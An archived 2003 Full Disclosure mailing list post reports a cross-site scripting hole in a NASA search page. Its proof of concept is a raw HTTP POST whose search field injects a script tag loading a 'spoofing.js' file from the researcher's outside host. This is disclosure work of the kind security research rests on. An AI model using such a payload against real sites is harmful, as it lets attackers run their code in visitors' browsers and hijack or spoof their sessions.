Full Disclosure mailing list archives
More Cross Site Scripting in NASA.gov Sites
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Wed, 15 Oct 2003 01:33:44 +0200
Hi friends, Another security hole in a nasa.gov website , another XSS: Use this post request for proof of concept: _________________________________ POST /search/query.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */* Referer: http://www.whereeveryouare.foo Accept-Language: en Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: si.ksc.nasa.gov Content-Length: 129 Pragma: no-cache Cookie: ASPSESSIONID[FIRSTSESSIONSTRING]=[MYSESSION] Connection: keep-alive Browser reload detected... Posting 129 bytes... SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.c om%2 Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E Action=Go _________________________________ Best regards and remember that security is a mind status ! Greetings to all the community: morning-wood for his arin.net greeting to me , cyrus-tc , etc. ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->/* not csh but sh */ 0x02->$ PATH=pretending!/usr/ucb/which sense 0x03-> no sense in pretending! __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** No Secure Root Group Security Research Team http://www.nsrg-security.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- More Cross Site Scripting in NASA.gov Sites Lorenzo Hernandez Garcia-Hierro (Oct 14)